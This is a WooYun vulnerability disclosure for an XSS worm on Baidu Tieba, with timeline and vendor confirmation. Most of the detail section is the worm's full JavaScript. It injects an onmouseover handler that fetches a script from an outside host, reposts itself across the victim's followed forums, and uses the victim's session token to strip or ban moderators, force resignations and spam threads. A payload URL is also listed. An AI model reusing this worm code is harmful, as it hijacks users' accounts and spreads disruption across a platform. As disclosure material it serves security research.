当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053221

漏洞标题:百度贴吧xss蠕虫20140309

相关厂商:百度

漏洞作者: 熊猫

提交时间:2014-03-09 19:04

修复时间:2014-04-23 19:04

公开时间:2014-04-23 19:04

漏洞类型:恶意信息传播

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-09: 细节已通知厂商并且等待厂商处理中
2014-03-09: 厂商已经确认,细节仅向厂商公开
2014-03-19: 细节向核心白帽子及相关领域专家公开
2014-03-29: 细节向普通白帽子公开
2014-04-08: 细节向实习白帽子公开
2014-04-23: 细节向公众公开

简要描述:

百度贴吧出现xss传播帖

详细说明:

var n=PageData.user.user_forum_list.info.length;
var num=0;
	var config = { 
		titles: ["\u4f60\u7684\u672a\u6765\u5728\u8fd9\u4e2a\u5e16\u5b50\u91cc\uff0c\u60f3\u770b\u5417\uff1f", "\u611a\u8822\u7684\u51e1\u4eba \u63a5\u53d7\u795e\u306e\u6012\u706b\u5427","\u8fd9\u662f\u547d\u8fd0\u77f3\u4e4b\u95e8\u7684\u9009\u62e9","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01","\u6b3a\u9a97\u4e00\u5f00\u59cb\u7684\u4f60 \u6b3a\u9a97\u4e16\u754c\u5427","\u8c01\u8981\u5403\u53d8\u6001\u7684\u9999\u8549\uff01","\u521a\u624d\u6536\u5230\u4e86\u5f3a\u70c8\u7684\u7cbe\u795e\u653b\u51fb \u5fc3...\u5fc3\u7075\u6b63\u906d\u5230\u4fb5\u8680","\u4e0d\u8981\u9760\u8fd1\u6211\uff01\u6211\u6b63\u5728\u6267\u884c\u963b\u6b62\u673a\u5173\u66b4\u529b\u884c\u4e3a\u7684\u4f5c\u6218","\u624b\u62ff\u91d1\u5777\u5783\uff0c\u811a\u8e0f\u4e03\u5f69\u4e91\u7aef\uff0c\u53d1\u51fa\u6700\u540e\u7684\u5450\u558a","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01"],
		contents: ['"style="height:100%;width:100;position:fixed'],
		tbs: PageData.tbs,
		whiteList: [635137, 1074587, 116863],
        evilContent: '"onmouseover="$.getScript(\u0027//baid.ws/c8tf\u0027)' //xss
	};
	var userInfo = {
        is_red_tail:function(i){$.get('http://tieba.baidu.com/home/get/panel?ie=utf-8&un='+PageData.user.name,function(data){return data.data.identity});}(),
		is_bawu: function (p) {
			return p.bawu ? p.can_edit_gconforum ? "daba" : "xiaoba" : "none"
		}(PageData.user.power)
	};
	function addGood(fid, kw, tid) {
		$.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdSGD&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&z=' + tid + '&fid=' + fid + '&ntn=set&pn=0&cate=0&expand=0&pinf=1_2_0');
	}
	function topThread(fid, kw, tid) { 
		$.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdTOP&z=' + tid + '&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&expand=0&fid=' + fid + '&ntn=set&pinf=1_2_0');
	}
	function killXiaoBa() {
		$.get("/bawu2/platform/listBawuTeam?ie=utf-8&word=" + encodeURIComponent(PageData.forum.name), function (x) {
			$(x).find("ul[id*='assist']").find("li[data-field*='\"user_id\":']").each(function () {
				$.post("/bawu2/platform/delBawuMember", {
					tbs: config.tbs,
					word: PageData.forum.name,
					user_id: $.parseJSON(this.dataset.field).user_id,
					type: "assist",
					ie: "utf-8"
				});
			});
		});
	}
	function banXiaoBa() {
		$.get('http://tieba.baidu.com/f/bawu/admin_group?ie=utf-8&kw=' + encodeURIComponent(PageData.forum.name) + '&fid=' + PageData.forum.id, function (res) {
			$(res).find('tr:nth-child(3)').find('a').each(function () {
				$.post('/bawu/cm', {
					cm: 'filter_forum_user',
					ban_days: 1,
					user_name: $(this).text(),
					word: PageData.forum.name,
					fid: PageData.forum.id,
					tbs: config.tbs,
					ie: 'utf-8'
				})
			})
		})
	}
	function czDaba() {
		$.post('/bawu/cm', {
			cm: 'apply_resign',
			resignation: '\u518d\u89c1\u4e86 \u6211\u7684\u670b\u53cb\u4eec.',
			dtype: 'json',
			word: PageData.forum.name,
			fid: PageData.forum.id,
			tbs: config.tbs,
			ie: 'utf-8'
		})
	}
	function addThread(fid) {
		$.post("/relay/commit", {
			ie: "utf-8",
			kw: "test",
            fid:35,
            tid:2910585163,
			ftid: fid,
            ptid:2910585163,
            ppid:47102132189,
			tbs: PageData.tbs,
			title: config.titles[Math.random() * config.titles.length | 0],
			content: "aeb1cb13495409230133f7cd9058d109b3de492f#"+config.contents[Math.random() * config.contents.length | 0]+config.evilContent,
new_vcode:1,
tag:11,
activity_id:1425,
act_type:"photo",
__type__:"repost"
		},function (x) {
          if (x.no == 0 || x.new_thread_id) return x.new_thread_id;})
	}
function reply(){
  if (-1 !== config.whiteList.indexOf(PageData.user.user_forum_list.info[num].id) || !userInfo.is_red_tail && !PageData.user.user_forum_list.info[num].is_like){num++;return;}
  if(PageData.user.user_forum_list.info[num].tid){
   num++;
  }else{
    PageData.user.user_forum_list.info[num].tid=true;addThread(PageData.user.user_forum_list.info[num].id);
  }
}
	function fuckRedTail() {
		var obj = {
			ie: "utf-8",
			kw: "\u8d34\u5427\u610f\u89c1\u53cd\u9988",
			fid: 898666,
			tbs: PageData.tbs,
			title: "\u767e\u5ea6SB",
			content: config.contents[Math.random() * config.contents.length | 0]
		}
		for(var i=0;i<100;i++){
			$.post("/f/commit/thread/add",obj);
		}
	}
	if(userInfo.is_red_tail){setInterval("fuckRedTail()",8000)}
	if ("daba" === userInfo.is_bawu){ killXiaoBa(); czDaba();}
	if ("xiaoba" === userInfo.is_bawu) banXiaoBa();
var ruchong=setInterval("reply()",2000);

漏洞证明:

newwordpress.duapp.com/xss20140309/rc1.js
全贴吧http://tieba.baidu.com/p/2911107056

tiebaabc.png


修复方案:

修复...

版权声明:转载请注明来源 熊猫@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-09 19:59

厂商回复:

感谢提交,已通知业务部门紧急修复

最新状态:

暂无